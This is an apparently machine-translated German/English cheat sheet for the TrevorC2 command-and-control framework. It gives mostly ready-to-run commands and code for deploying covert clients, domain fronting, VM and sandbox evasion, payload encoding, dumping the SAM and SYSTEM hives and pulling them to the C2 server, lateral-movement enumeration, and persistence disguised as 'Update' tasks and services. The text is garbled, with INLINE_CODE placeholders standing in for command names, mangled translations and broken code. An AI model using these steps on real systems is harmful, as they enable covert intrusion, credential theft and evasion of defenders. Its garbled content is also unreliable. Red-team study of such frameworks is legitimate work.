TrevorC2 Framework Cheat Sheet¶
_
Im Überblick
TrevorC2 ist eine legitime Website, die Client/Server-Kommunikation für verdeckte Befehlsausführung Tunnel. Entwickelt von TrustedSec, verwendet es legitime Websites als Front für Befehls- und Steuerungskommunikation, so dass Erkennung extrem schwierig, da der Verkehr scheint normal Web-Browsing.
ZEITSCHRIFTEN Warning: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.
• Installation
Git Installation¶
```bash
Clone the repository¶
git clone https://github.com/trustedsec/trevorc2.git cd trevorc2
Install Python dependencies¶
pip3 install -r requirements.txt ```_
Manual Setup¶
```bash
Download latest release¶
wget https://github.com/trustedsec/trevorc2/archive/master.zip unzip master.zip cd trevorc2-master
Install dependencies¶
pip3 install pycrypto requests ```_
Docker Installation¶
```bash
Build Docker container¶
git clone https://github.com/trustedsec/trevorc2.git cd trevorc2 docker build -t trevorc2 .
Run container¶
docker run -it -p 443:443 trevorc2 ```_
oder Basisnutzung
Server Setup¶
```bash
Start TrevorC2 server¶
python3 trevorc2_server.py
Start server with custom configuration¶
python3 trevorc2_server.py --config custom_config.py
Start server on specific port¶
python3 trevorc2_server.py --port 8080 ```_
Client Deployment¶
```bash
Generate client¶
python3 trevorc2_client.py
Generate client with custom server¶
python3 trevorc2_client.py --server https://example.com
Generate PowerShell client¶
python3 trevorc2_client.py --powershell ```_
Befehlsnummer
Server Befehle¶
| Command | Description |
|---|---|
| INLINE_CODE_25 | Display help menu |
| INLINE_CODE_26 | List active agents |
| INLINE_CODE_27 | Interact with agent |
| INLINE_CODE_28 | Kill specific agent |
| INLINE_CODE_29 | Kill all agents |
| INLINE_CODE_30 | Exit server |
| _ | |
| ### Agent Interaction | |
| Command | Description |
| --------- | ------------- |
| INLINE_CODE_31 | Execute shell command |
| INLINE_CODE_32 | Upload file to agent |
| INLINE_CODE_33 | Download file from agent |
| INLINE_CODE_34 | Take screenshot |
| INLINE_CODE_35 | Start keylogger |
| INLINE_CODE_36 | Stop keylogger |
| INLINE_CODE_37 | Dump keylogger data |
| INLINE_CODE_38 | Install persistence |
| INLINE_CODE_39 | Migrate to process |
| INLINE_CODE_40 | Background agent |
Konfiguration
Server Konfiguration¶
```python
config.py¶
BIND_PORT = 443 HOSTNAME = "0.0.0.0" WEBSITE_FOLDER = "site/" CERT_FILE = "server.pem"
Encryption settings¶
CIPHER_TYPE = "AES" HASH_TYPE = "SHA256"
Communication settings¶
BEACON_INTERVAL = 10 JITTER = 0.2
Logging¶
LOG_FILE = "trevorc2.log" DEBUG = False ```_
Client Configuration¶
```python
Client settings¶
SERVER_URL = "https://example.com" USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" SLEEP_TIME = 10 JITTER = 0.2
Persistence settings¶
PERSISTENCE_METHOD = "registry" PERSISTENCE_KEY = "Software\Microsoft\Windows\CurrentVersion\Run" ```_
Erweiterte Eigenschaften
Website Masquerading¶
```bash
Set up legitimate website front¶
mkdir site cp -r /var/www/html/* site/
Use custom website¶
python3 trevorc2_server.py --site /path/to/website
Clone existing website¶
wget -r -p -k https://example.com python3 trevorc2_server.py --site example.com/ ```_
SSL/TLS Konfiguration¶
```bash
Generate self-signed certificate¶
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
Use custom certificate¶
python3 trevorc2_server.py --cert /path/to/cert.pem --key /path/to/key.pem
Let's Encrypt certificate¶
certbot certonly --standalone -d yourdomain.com python3 trevorc2_server.py --cert /etc/letsencrypt/live/yourdomain.com/fullchain.pem --key /etc/letsencrypt/live/yourdomain.com/privkey.pem ```_
Domain Fronting¶
```python
Configure domain fronting¶
FRONT_DOMAIN = "cdn.example.com" HOST_HEADER = "legitimate-site.com"
Client configuration for domain fronting¶
client_config = \\{ 'server_url': 'https://cdn.example.com', 'host_header': 'legitimate-site.com', 'sni': 'cdn.example.com' \\} ```_
• Kundengeneration
Windows Client¶
```bash
Generate Windows executable¶
python3 trevorc2_client.py --windows --output client.exe
Generate PowerShell client¶
python3 trevorc2_client.py --powershell --output client.ps1
Generate batch file client¶
python3 trevorc2_client.py --batch --output client.bat ```_
Linux Client¶
```bash
Generate Linux binary¶
python3 trevorc2_client.py --linux --output client
Generate Python client¶
python3 trevorc2_client.py --python --output client.py
Generate shell script client¶
python3 trevorc2_client.py --shell --output client.sh ```_
macOS Client¶
```bash
Generate macOS binary¶
python3 trevorc2_client.py --macos --output client
Generate AppleScript client¶
python3 trevorc2_client.py --applescript --output client.scpt ```_
Evasion Techniques
Traffic Obfuscation¶
```python
Custom User-Agent strings¶
USER_AGENTS = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36" ]
Random beacon intervals¶
import random SLEEP_TIME = random.randint(5, 15) ```_
Payload Encoding¶
```bash
Base64 encode payload¶
echo "payload"|base64
XOR encode payload¶
python3 -c " import sys key = 0xAA payload = sys.argv[1] encoded = ''.join([chr(ord© ^ key) for c in payload]) print(encoded.encode('hex')) " "your_payload" ```_
Anti-Analysis¶
```python
VM detection¶
import subprocess def check_vm(): vm_indicators = ['VMware', 'VirtualBox', 'QEMU'] try: output = subprocess.check_output('systeminfo', shell=True) for indicator in vm_indicators: if indicator in output.decode(): return True except: pass return False
Sandbox evasion¶
import time def sandbox_evasion(): time.sleep(60) # Sleep to avoid sandbox analysis # Check for mouse movement, user activity, etc. ```_
Post-Exploitation
Information Gathering¶
```bash
System information¶
shell systeminfo shell whoami /all shell net user shell net group
Network information¶
shell ipconfig /all shell netstat -an shell arp -a shell route print ```_
Credential Harvesting¶
```bash
Dump SAM database¶
shell reg save HKLM\SAM sam.hiv shell reg save HKLM\SYSTEM system.hiv download sam.hiv download system.hiv
Browser credentials¶
shell dir "%APPDATA%\Mozilla\Firefox\Profiles" shell dir "%LOCALAPPDATA%\Google\Chrome\User Data\Default"
Saved passwords¶
shell cmdkey /list ```_
Lateral Movement¶
```bash
Network discovery¶
shell net view shell ping -n 1 192.168.1.1-254
Share enumeration¶
shell net view \target-computer shell dir \target-computer\c$
Service enumeration¶
shell sc query shell tasklist /svc ```_
Persistence Mechanismen¶
```bash
Registry persistence¶
shell reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Update" /d "C:\temp\client.exe"
Scheduled task¶
shell schtasks /create /tn "Update" /tr "C:\temp\client.exe" /sc onlogon
Service persistence¶
shell sc create "UpdateService" binpath= "C:\temp\client.exe" shell sc config "UpdateService" start= auto ```_
Operationelle Sicherheit
Kommunikationssicherheit¶
```python
Encrypted communications¶
from Crypto.Cipher import AES from Crypto.Random import get_random_bytes
def encrypt_data(data, key): cipher = AES.new(key, AES.MODE_GCM) ciphertext, tag = cipher.encrypt_and_digest(data.encode()) return cipher.nonce + tag + ciphertext
Certificate pinning¶
import ssl def verify_certificate(hostname, cert_path): context = ssl.create_default_context() context.check_hostname = False context.verify_mode = ssl.CERT_REQUIRED context.load_verify_locations(cert_path) ```_
Operational Procedures¶
```bash
Rotate infrastructure regularly¶
Use different domains and IPs¶
Implement proper logging and monitoring¶
Use legitimate certificates¶
Vary communication patterns¶
```_
Fehlerbehebung
Verbindungsprobleme¶
```bash
Check server status¶
netstat -tlnp|grep :443
Test connectivity¶
curl -k https://your-server.com
Check firewall rules¶
iptables -L ufw status ```_
Client Issues¶
```bash
Debug client connection¶
Add debug prints to client code¶
print("Connecting to server...") print(f"Response: \\{response.status_code\\}")
Check DNS resolution¶
nslookup your-server.com dig your-server.com ```_
Zertifikat Probleme¶
```bash
Verify certificate¶
openssl x509 -in server.pem -text -noout
Test SSL connection¶
openssl s_client -connect your-server.com:443
Check certificate chain¶
curl -vI https://your-server.com ```_
Detection Evasion
Network Level¶
- Verwenden Sie legitime Domains und Zertifikate
- Implement Domain Fronting
- Vary Kommunikationsintervalle
- Verwenden Sie gemeinsame Ports (80, 443)
- Mimic legitime Verkehrsmuster
Host Level¶
- Vermeiden Sie gemeinsame IOCs
- Verwenden Sie legitime Prozessnamen
- Implementierung von Anti-VM-Techniken
- Dateilose Ausführung verwenden
- Verschlüsseln von Nutzlasten und Kommunikation
Behavioral¶
- Ressourcennutzung begrenzen
- Verdächtige Aktivitäten vermeiden
- Verwenden Sie legitime Benutzer
- Implementierung einer korrekten Fehlerbehandlung
- Saubere Artefakte
Ressourcen
- (TrevorC2 GitHub Repository)(https://github.com/trustedsec/trevorc2)
- TrustedSec Blog
- TrevorC2 Dokumentation
- (Red Team Infrastructure)(https://blog.cobaltstrike.com/2014/09/09/infrastructure-for-ongoing-red-team-operations/)
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von TrevorC2. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *